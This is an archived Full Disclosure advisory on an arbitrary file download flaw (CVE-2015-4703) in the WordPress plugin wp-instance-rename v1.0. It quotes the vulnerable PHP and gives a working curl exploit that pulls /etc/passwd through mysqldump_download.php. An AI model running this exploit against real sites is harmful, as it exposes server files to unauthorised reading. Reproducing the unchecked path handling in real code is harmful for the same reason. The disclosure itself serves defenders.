[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2015-06-26 0:45:18
Message-ID: 6814ADA4-7EAF-40D6-9515-F875DE6F5668 () me ! com
[Download RAW message or body]

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress \
installation. This plugin allows you to rename WordPress database, WordPress directory, change \
every necessary configuration file, easily from one page. Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended \
download directory:

try{
	$dbname   = $_GET["dbname"];
	$dumpfname = $_GET["dumpfname"];
	$backup_folder = $_GET["backup_folder"];	
}catch (Exception $e){}

if(empty($backup_folder)){
	$backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {		
	// zip the dump file	
	$name=$dbname . "_" . date("Y-m-d");	
	$zipfname = $backup_folder.$name.".zip";
	$zip = new ZipArchive();	
	if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
	{
	   $zip->addFile($dumpfname,$dumpfname);
	   $zip->close();
	}	
	// read zip file and send it to standard output
	if (file_exists($zipfname)) {
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename='.basename($zipfname));
		flush();
		readfile($zipfname);

CVEID: 2015-4703
OSVDB:
Exploit Code:
	• curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=."  \
http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic